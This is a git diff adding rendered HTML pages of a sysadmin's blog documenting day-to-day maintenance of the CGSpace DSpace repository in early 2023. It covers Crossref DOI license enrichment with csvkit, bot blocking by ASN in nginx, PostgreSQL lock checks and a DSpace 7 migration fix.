+<li>Export the entire CGSpace to do Initiatives collection mappings</li>
+<li>I was thinking about a way to use Crossref&rsquo;s API to enrich our data, for example checking registered DOIs for license information, publishers, etc
+<ul>
+<li>Turns out I had already written <code>crossref-doi-lookup.py</code> last year, and it works</li>
+<li>I exported a list of all DOIs without licenses from CGSpace, minus the CIFOR ones because I know they aren&rsquo;t registered on Crossref, which is about 11,800 DOIs</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.identifier.doi[en_US]&#39;</span> ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvgrep -c &#39;cg.identifier.doi[en_US]&#39; -r &#39;.*cifor.*&#39; -i \
+</span></span><span style="display:flex;"><span>  | sed 1d &gt; /tmp/2023-01-29-dois.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2023-01-29-dois.txt
+</span></span><span style="display:flex;"><span>11819 /tmp/2023-01-29-dois.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-01-29-dois.txt -o /tmp/crossref-results.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.identifier.doi[en_US]&#39;</span> ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | sed -e &#39;s_https://doi.org/__g&#39; -e &#39;s_https://dx.doi.org/__g&#39; -e &#39;s/cg.identifier.doi\[en_US\]/doi/&#39; \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/cgspace-temp.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c doi /tmp/cgspace-temp.csv /tmp/crossref-results.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvgrep -c license -r &#39;creative&#39; \
+</span></span><span style="display:flex;"><span>  | sed &#39;1s/license/dcterms.license[en_US]/&#39; \
+</span></span><span style="display:flex;"><span>  | csvcut -c id,license &gt; /tmp/2023-01-29-new-licenses.csv
+</span></span></code></pre></div><ul>
+<li>The above was done with just 5,000 DOIs because it was taking a long time, but after the last step I imported into OpenRefine to clean up the license URLs
+<ul>
+<li>Then I imported 635 new licenses to CGSpace woooo</li>
+<li>After checking the remaining 6,500 DOIs there were another 852 new licenses, woooo</li>
+</ul>
+</li>
+<li>Peter finished the corrections on affiliations, authors, and donors
+<ul>
+<li>I quickly checked them and applied each on CGSpace</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-30">2023-01-30</h2>
+<ul>
+<li>Run the thumbnail fixer tasks on the Initiatives collections:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails 10568/115087 | tee -a /tmp/FixLowQualityThumbnails.log
+</span></span><span style="display:flex;"><span>$ grep -c remove /tmp/FixLowQualityThumbnails.log
+</span></span><span style="display:flex;"><span>16
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails 10568/115087 | tee -a /tmp/FixJpgJpgThumbnails.log
+</span></span><span style="display:flex;"><span>$ grep -c replacing /tmp/FixJpgJpgThumbnails.log 
+</span></span><span style="display:flex;"><span>13
+</span></span></code></pre></div><h2 id="2023-01-31">2023-01-31</h2>
+<ul>
+<li>Someone from the Google Scholar team contacted us to ask why Googlebot is blocked from crawling CGSpace
+<ul>
+<li>I said that I blocked them because they crawl haphazardly and we had high load during PRMS reporting</li>
+<li>Now I will unblock their ASN15169 in nginx&hellip;</li>
+<li>I urged them to be smarter about crawling since we&rsquo;re a small team and they are a huge engineering company</li>
+</ul>
+</li>
+<li>I removed their ASN and regenerted my list from 2023-01-17:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/list/AS714 <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>     https://asn.ipinfo.app/api/text/list/AS16276 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS23576 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS24940 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS13238 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS32934 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS14061 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS12876 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS55286 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS203020 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS204287 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS50245 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS6939 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS16509 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS14618
+</span></span><span style="display:flex;"><span>$ cat AS* | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>17134
+</span></span><span style="display:flex;"><span>$ cat /tmp/AS* | ~/go/bin/mapcidr -a &gt; /tmp/networks.txt
+</span></span></code></pre></div><ul>
+<li>Then I updated nginx&hellip;</li>
+<li>Re-run the scripts to delete duplicate metadata values and update item timestamps that I originally used in 2022-11
+<ul>
+<li>This was about 650 duplicate metadata values&hellip;</li>
+</ul>
+</li>
+<li>Exported CGSpace to do some metadata interrogation in OpenRefine
+<ul>
+<li>I looked at items that are set as <code>Limited Access</code> but have Creative Commons licenses</li>
+<li>I filtered ~150 that had DOIs and checked them on the Crossref API using <code>crossref-doi-lookup.py</code></li>
+<li>Of those, only about five or so were incorrectly marked as having Creative Commons licenses, so I set those to copyrighted</li>
+<li>For the rest, I set them to Open Access</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-02/index.html b/docs/2023-02/index.html
new file mode 100644
index 000000000..4261fdc53
--- /dev/null
+++ b/docs/2023-02/index.html
@@ -0,0 +1,701 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2023" />
+<meta property="og:description" content="2023-02-01
+
+Export CGSpace to cross check the DOI metadata with Crossref
+
+I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-02/" />
+<meta property="article:published_time" content="2023-02-01T10:57:36+03:00" />
+<meta property="article:modified_time" content="2023-03-01T08:30:25+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2023"/>
+<meta name="twitter:description" content="2023-02-01
+
+Export CGSpace to cross check the DOI metadata with Crossref
+
+I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-02/",
+  "wordCount": "3087",
+  "datePublished": "2023-02-01T10:57:36+03:00",
+  "dateModified": "2023-03-01T08:30:25+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-02/">
+
+    <title>February, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-02/">February, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-02-01T10:57:36+03:00">Wed Feb 01, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-02-01">2023-02-01</h2>
+<ul>
+<li>Export CGSpace to cross check the DOI metadata with Crossref
+<ul>
+<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>First, extract a list of DOIs for use with <code>crossref-doi-lookup.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.identifier.doi[en_US]&#39;</span> ~/Downloads/2023-02-01-cgspace.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvgrep -c 1 -m &#39;doi.org&#39; \
+</span></span><span style="display:flex;"><span>  | csvgrep -c 1 -m &#39; &#39; -i \
+</span></span><span style="display:flex;"><span>  | csvgrep -c 1 -r &#39;.*cifor.*&#39; -i \
+</span></span><span style="display:flex;"><span>  | sed 1d &gt; /tmp/2023-02-01-dois.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-02-01-dois.txt -o ~/Downloads/2023-01-31-crossref-results.csv -d
+</span></span></code></pre></div><ul>
+<li>Then extract the ID, DOI, journal, volume, issue, publisher, etc from the CGSpace dump and rename the <code>cg.identifier.doi[en_US]</code> to <code>doi</code> so we can join on it with the Crossref results file:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.identifier.doi[en_US],cg.journal[en_US],cg.volume[en_US],cg.issue[en_US],dcterms.publisher[en_US],cg.number[en_US],dcterms.license[en_US]&#39;</span> ~/Downloads/2023-02-01-cgspace.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvgrep -c &#39;cg.identifier.doi[en_US]&#39; -r &#39;.*cifor.*&#39; -i \
+</span></span><span style="display:flex;"><span>  | sed -e &#39;1s/cg.identifier.doi\[en_US\]/doi/&#39; \
+</span></span><span style="display:flex;"><span>    -e &#39;s_https://doi.org/__g&#39; \
+</span></span><span style="display:flex;"><span>    -e &#39;s_https://dx.doi.org/__g&#39; \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/2023-02-01-cgspace-doi-metadata.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c doi /tmp/2023-02-01-cgspace-doi-metadata.csv ~/Downloads/2023-02-01-crossref-results.csv &gt; /tmp/2023-02-01-cgspace-crossref-check.csv
+</span></span></code></pre></div><ul>
+<li>And import into OpenRefine for analysis and cleaning</li>
+<li>I just noticed that Crossref also has types, so we could use that in the future too!</li>
+<li>I got a few corrections after examining manually, but I didn&rsquo;t manage to identify any patterns that I could use to do any automatic matching or cleaning</li>
+</ul>
+<h2 id="2023-02-05">2023-02-05</h2>
+<ul>
+<li>Normalize text lang attributes in PostgreSQL, run a quick Discovery index, and then export CGSpace to check Initiative mappings and countries/regions</li>
+<li>Run all system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2023-02-06">2023-02-06</h2>
+<ul>
+<li>Peter said that a new Initiative was approved last month so we need to add it to CGSpace: <code>Fragility, Conflict, and Migration</code></li>
+<li>There is lots of discussion about the &ldquo;issue date&rdquo; versus &ldquo;available date&rdquo; with Enrico and IFPRI, after lots of feedback from the PRMS QA
+<ul>
+<li>I filed <a href="https://github.com/AgriculturalSemantics/cg-core/issues/43">an issue on CG Core to propose using <code>dcterms.available</code> as an optional field to indicate the online date</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-07">2023-02-07</h2>
+<ul>
+<li>IFPRI&rsquo;s web developer Tony managed to get his Drupal harvester to have a useful user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>54.x.x.x - - [06/Feb/2023:10:10:32 +0100] &#34;POST /rest/items/find-by-metadata-field?limit=%22100&amp;offset=0 HTTP/1.1&#34; 200 58855 &#34;-&#34; &#34;IFPRI drupal POST harvester&#34;
+</span></span></code></pre></div><ul>
+<li>He also noticed that there is no pagination on POST requests to <code>/rest/items/find-by-metadata-field</code>, and that he needs to increase his timeout for requests that return 100+ results, ie:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.actionArea&#34;, &#34;value&#34;:&#34;Systems Transformation&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
+</span></span></code></pre></div><ul>
+<li>I need to ask on the DSpace Slack about this POST pagination</li>
+<li>Abenet and Udana noticed that the Handle server was not running
+<ul>
+<li>Looking in the <code>error.log</code> file I see that the service is complaining about a lock file being present</li>
+<li>This is because Linode had to do emergency maintenance on the VM host this morning and the Handle server didn&rsquo;t shut down properly</li>
+</ul>
+</li>
+<li>I&rsquo;m having an issue with <code>poetry update</code> so I spent some time debugging and filed <a href="https://github.com/python-poetry/poetry/issues/7482">an issue</a></li>
+<li>Proof and import nine items for the Digital Innovation Inititive for IFPRI
+<ul>
+<li>There were only some minor issues in the metadata</li>
+<li>I also did a duplicate check with <code>check-duplicates.py</code> just in case</li>
+</ul>
+</li>
+<li>I did some minor updates on csv-metadata-quality
+<ul>
+<li>First, to reduce warnings on non-SPDX licenses like &ldquo;Copyrighted; all rights reserved&rdquo; and &ldquo;Other&rdquo; since they are very common for us and I&rsquo;m sick of seeing the warnings</li>
+<li>Second, to skip whitespace and newline fixes on the abstract field since so many times they are intended</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-08">2023-02-08</h2>
+<ul>
+<li>Make some edits to IFPRI records requested by Jawoo and Leigh</li>
+<li>Help Alessandra upload a last minute report for SAPLING</li>
+<li>Proof and upload twenty-seven IFPRI records to CGSpace
+<ul>
+<li>It&rsquo;s a good thing I did a duplicate check because I found three duplicates!</li>
+</ul>
+</li>
+<li>Export CGSpace to update Initiative mappings and country/region mappings
+<ul>
+<li>Then start a harvest on AReS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-09">2023-02-09</h2>
+<ul>
+<li>Do some minor work on the CSS on the DSpace 7 test</li>
+</ul>
+<h2 id="2023-02-10">2023-02-10</h2>
+<ul>
+<li>I noticed a large number of PostgreSQL locks from dspaceWeb on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   2033 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Looking at the lock age, I see some already 1 day old, including this curious query:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>select nextval (&#39;public.registrationdata_seq&#39;)
+</span></span></code></pre></div><ul>
+<li>I killed all locks that were more than a few hours old</li>
+<li>Export CGSpace to update Initiative collection mappings</li>
+<li>Discuss adding <code>dcterms.available</code> to the submission form
+<ul>
+<li>I also looked in the <code>dcterms.description</code> field on CGSpace and found ~1,500 items where the is an indication of an online published date</li>
+<li>Using some facets in OpenRefine I narrowed down the ones mentioning &ldquo;online&rdquo; and then extracted the dates to a new column:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cells[&#39;dcterms.description[en_US]&#39;].value.replace(/.*?(\d+{2}) ([a-zA-Z]+) (\d+{2}).*/,&#34;$3-$2-$1&#34;)
+</span></span></code></pre></div><ul>
+<li>Then to handle formats like &ldquo;2022-April-26&rdquo; and &ldquo;2021-Nov-11&rdquo; I used some replacement GRELs (note the order so we don&rsquo;t replace short patterns in longer strings prematurely):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.replace(&#34;January&#34;,&#34;01&#34;).replace(&#34;February&#34;,&#34;02&#34;).replace(&#34;March&#34;,&#34;03&#34;).replace(&#34;April&#34;,&#34;04&#34;).replace(&#34;May&#34;,&#34;05&#34;).replace(&#34;June&#34;,&#34;06&#34;).replace(&#34;July&#34;,&#34;07&#34;).replace(&#34;August&#34;,&#34;08&#34;).replace(&#34;September&#34;,&#34;09&#34;).replace(&#34;October&#34;,&#34;10&#34;).replace(&#34;November&#34;,&#34;11&#34;).replace(&#34;December&#34;,&#34;12&#34;)
+</span></span><span style="display:flex;"><span>value.replace(&#34;Jan&#34;,&#34;01&#34;).replace(&#34;Feb&#34;,&#34;02&#34;).replace(&#34;Mar&#34;,&#34;03&#34;).replace(&#34;Apr&#34;,&#34;04&#34;).replace(&#34;May&#34;,&#34;05&#34;).replace(&#34;Jun&#34;,&#34;06&#34;).replace(&#34;Jul&#34;,&#34;07&#34;).replace(&#34;Aug&#34;,&#34;08&#34;).replace(&#34;Sep&#34;,&#34;09&#34;).replace(&#34;Oct&#34;,&#34;10&#34;).replace(&#34;Nov&#34;,&#34;11&#34;).replace(&#34;Dec&#34;,&#34;12&#34;)
+</span></span></code></pre></div><ul>
+<li>This covered about 1,300 items, then I did about 100 more messier ones with some more regex wranling
+<ul>
+<li>I removed the <code>dcterms.description[en_US]</code> field from items where I updated the dates</li>
+</ul>
+</li>
+<li>Then I added <code>dcterms.available</code> to the submission form and the item view
+<ul>
+<li>We need to announce this to the editors</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-13">2023-02-13</h2>
+<ul>
+<li>Export CGSpace to do some metadata quality checks
+<ul>
+<li>I added CGIAR Trust Fund as a donor to some new Initiative outputs</li>
+<li>I moved some abstracts from the description field</li>
+<li>I moved some version information to the <code>cg.edition</code> field</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-14">2023-02-14</h2>
+<ul>
+<li>The PRMS team in Colombia sent some questions about countries on CGSpace
+<ul>
+<li>I had to fix some, that were clearly wrong, but there is also a difference between CGSpace and MEL because we use mostly iso-codes, and MEL uses the UN M.49 list</li>
+<li>Then I re-ran the country code tagger from cgspace-java-helpers, forcing the update on all items in the Initiatives community</li>
+</ul>
+</li>
+<li>Remove Alliance research levers from <code>cg.contributor.crp</code> field after discussing with Daniel and Maria
+<ul>
+<li>This was a mistake on TIP&rsquo;s part, and there is no direct mapping between research levers and CRPs</li>
+</ul>
+</li>
+<li>I exported CGSpace to check Initiative collection mappings, regions, and licenses
+<ul>
+<li>Peter told me that all CGIAR blog posts for the Initiatives should be CC-BY-4.0, and I see the logo at the bottom in light gray!</li>
+<li>I had previously missed that and removed some licenses for blog posts</li>
+<li>I checked cgiar.org, ifpri.org, icarda.org, iwmi.cgiar.org, irri.org, etc and corrected a handful</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-02-15">2023-02-15</h2>
+<ul>
+<li>Work on rebasing my local DSpace 7 dev branches on top of the latest 7.5-SNAPSHOT
+<ul>
+<li>It seems the issues I had with the <code>dspace submission-forms-migrate</code> tool in <a href="/cgspace-notes/2022-08/">August, 2022</a> were fixed</li>
+</ul>
+</li>
+<li>I imported a fresh PostgreSQL snapshot from CGSpace and then removed the Atmire migrations and ran the new migrations as I originally noted in <a href="/cgspace-notes/2022-03/">March, 2022</a>, and is pointed out in the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace 7 upgrade notes</a>
+<ul>
+<li>Now I get a new error:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);
+</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;
+</span></span><span style="display:flex;"><span>localhost/dspace7= \q
+</span></span><span style="display:flex;"><span>$ ./bin/dspace database migrate ignored
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>CREATE INDEX resourcepolicy_action_idx ON resourcepolicy(action_id)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.handleException(DefaultSqlScriptExecutor.java:275)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:222)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.execute(DefaultSqlScriptExecutor.java:126)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.executeOnce(SqlMigrationExecutor.java:69)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.lambda$execute$0(SqlMigrationExecutor.java:58)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.database.DefaultExecutionStrategy.execute(DefaultExecutionStrategy.java:27)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:57)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:377)
+</span></span><span style="display:flex;"><span>        ... 24 more
+</span></span><span style="display:flex;"><span>Caused by: org.postgresql.util.PSQLException: ERROR: relation &#34;resourcepolicy_action_idx&#34; already exists
+</span></span><span style="display:flex;"><span>        at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2676)
+</span></span><span style="display:flex;"><span>        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2366)
+</span></span><span style="display:flex;"><span>        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:356)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:496)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:413)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:333)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:319)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:295)
+</span></span><span style="display:flex;"><span>        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:290)
+</span></span><span style="display:flex;"><span>        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
+</span></span><span style="display:flex;"><span>        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.jdbc.JdbcTemplate.executeStatement(JdbcTemplate.java:201)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.sqlscript.ParsedSqlStatement.execute(ParsedSqlStatement.java:95)
+</span></span><span style="display:flex;"><span>        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:210)
+</span></span><span style="display:flex;"><span>        ... 30 more
+</span></span></code></pre></div><ul>
+<li>I dropped that index and then the migration succeeded:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DROP INDEX resourcepolicy_action_idx;
+</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ \q
+</span></span><span style="display:flex;"><span>$ ./bin/dspace database migrate ignored
+</span></span><span style="display:flex;"><span>Done.
+</span></span></code></pre></div><ul>
+<li>I think that particular error is because I applied the <a href="https://github.com/DSpace/DSpace/pull/1792">indexes in this unmerged DSpace 6 patch</a>, so I don&rsquo;t need to report this as an error in DSpace 7</li>
+</ul>
+<h2 id="2023-02-16">2023-02-16</h2>
+<ul>
+<li>I found a suspicious number of PostgreSQL locks on CGSpace and decided to investigate:</li>
+</ul>
